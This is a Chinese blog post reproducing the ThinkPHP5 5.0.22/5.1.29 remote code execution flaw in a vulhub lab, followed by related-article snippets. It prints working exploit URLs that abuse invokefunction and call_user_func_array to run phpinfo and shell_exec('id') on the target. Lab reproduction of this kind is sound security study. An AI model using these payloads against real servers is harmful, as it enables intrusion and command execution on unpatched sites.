vulhub中ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现

余生有个小酒馆

已于 2024-03-06 20:40:14 修改

阅读量228

点赞数 1

分类专栏： vulhub漏洞复现文章标签： web安全

于 2024-03-06 20:34:53 首次发布

本文链接：https://blog.csdn.net/yougexiaojiuguan/article/details/136517173

版权

vulhub漏洞复现专栏收录该内容

70 篇文章 3 订阅

订阅专栏

ThinkPHP是一款运用极广的PHP开发框架。其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。

1.环境启动后，访问http://your-ip:8080即可看到ThinkPHP默认启动页面。

2.直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1，即可执行phpinfo：

http://192.168.188.139:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

余生有个小酒馆

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
vulhub中ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现

漏洞复现的记录
复制链接

扫一扫

专栏目录

记录一次vulhub ：Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现

sszsNo1的博客

06-29

201

vulhub ：Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现

vulhub靶场thinkphp漏洞复现

weixin_44300286的博客

03-08

1561

0x01、ThinkPHP 2.x 任意代码执行漏洞原理 ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由： $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。 ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞，也存在这个漏洞。漏洞复现直接

参与评论您还未登录，请先登录后发表或查看评论

漏洞复现----23、ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

七天

07-14

1327

文章目录一、漏洞简介二、漏洞代码三、漏洞复现五、修复代码一、漏洞简介 ThinkPHP是PHP语言的一种开源框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境，正式版需要PHP5.0以上版本支持，支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展，ThinkPHP框架本身没有什么特别模块要求，具体的应用系统运行环境要求视开发所涉及的模块。由于框架对控制器名没有进行足够的检测，导致在没有开启强制路由的情况下可以执行任意方法，从而导致远程命令执行漏洞。受影响的版

thinkphp5 5.0.22/5.1.29远程代码执行漏洞

最新发布

weixin_45653478的博客

04-27

928

ThinkPHP是中国使用极为广泛的PHP开发框架。在其版本 5 中，由于框架错误地处理了控制器名称，如果网站未启用强制路由（默认），它可以执行任何方法，从而导致 RCE 漏洞。

【ThinkPHP5 5.0.22/5.1.29 RCE】

xhwfa的博客

05-02

3172

一、漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中，因为没有正确处理控制器名，致使在网站没有开启强制路由的状况下（即默认状况下）能够执行任意方法，从而致使远程命令执行漏洞。二、影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 三、漏洞环境搭建 cd /vulhub-master/thinkphp/5-rce docker-compose up -d 访问192.168.110.134:8080，出现如

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

城南以南花亦开

09-16

407

在 ThinkPHP 版本 5 中由于框架没有对控制器名进行正确检测处理从而导致的远程命令执行漏洞。

Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞

不曾扬帆，何以至远方

07-17

1904

Thinkphp 5 远程代码执行漏洞

thinkPHP5.0.22

12-06

ThinkPHP从诞生以来一直秉承简洁实用的设计原则，在保持出色的性能和至简的代码的同时，也注重易用性。遵循Apache2开源许可协议发布，意味着你可以免费使用ThinkPHP，甚至允许把你基于ThinkPHP开发的应用开源或商业...

Thinkphp-5-0远程代码执行漏洞1

08-03

Thinkphp-5-0远程代码执行漏洞1

漏洞通告ThinkPHP远程代码执行漏洞

05-05

【漏洞通告】ThinkPHP远程代码执行漏洞

call_user_func_array( )

12-29

150

调用回调函数，并把一个数组参数作为回调函数的参数 mixedcall_user_func_array(callable$callback,array$param_arr) 把第一个参数作为回调函数（callback）调用，把参数数组作（param_arr）为回调函数的的参数...

Thinkphp5 5.0.22 / 5.1.29远程执行代码漏洞漏洞复现

ADummy的博客

02-19

463

Thinkphp5 5.0.22 / 5.1.29远程执行代码漏洞 by ADummy 0x00利用路线 burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 TThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中，由于框架错误地处理了控制器名称，因此如果网站未启用强制路由（默认设置），则该框架可以执行任何方法，从而导致RCE漏洞。 ThinkPHP5 5.0.20 - 5.1.29 payload1： /inde

复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

weixin_67813445的博客

03-15

607

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

thinkphp5.0.22远程代码执行漏洞分析及复现

weixin_33947521的博客

01-12

474

　　虽然网上已经有几篇公开的漏洞分析文章，但都是针对5.1版本的，而且看起来都比较抽象；我没有深入分析5.1版本，但看了下网上分析5.1版本漏洞的文章，发现虽然POC都是一样的，但它们的漏洞触发原因是不同的。本文分析5.0.22版本的远程代码执行漏洞，分析过程如下：　　（1）漏洞复现　　环境php5.5.38+apache。　　POC：http://172.19.77.44/think...

call_user_func_array

weixin_34163741的博客

06-03

134

2019独角兽企业重金招聘Python工程师标准>>> ...

PHP中的call_user_func_array

Jack huang的专栏

03-26

171

场景一：参数数目不确定函数的参数是用户传入的，而且参数的数目不确定。如果不用call_user_func_array你会怎么做？一些PHP框架可以将$_GET参数自动映射到方法，就是这样实现的。场景二：用于函数回调回调函数可能是一个普通函数，可能是类方法，也可能是静态方法。如果使用call_user_func_array，你就不用去判断方法的类型。 ...

call_user_func(),call_user_func_array()使用

黑白相间...

11-18

863

call_user_func(),call_user_func_array() 是用来调用回调函数 //调用的是静态方法 &amp;lt;?php namespace Foobar; class Foo { static public function test($param) { print &quot;Hello world! \$param \n&quot;; } } $para...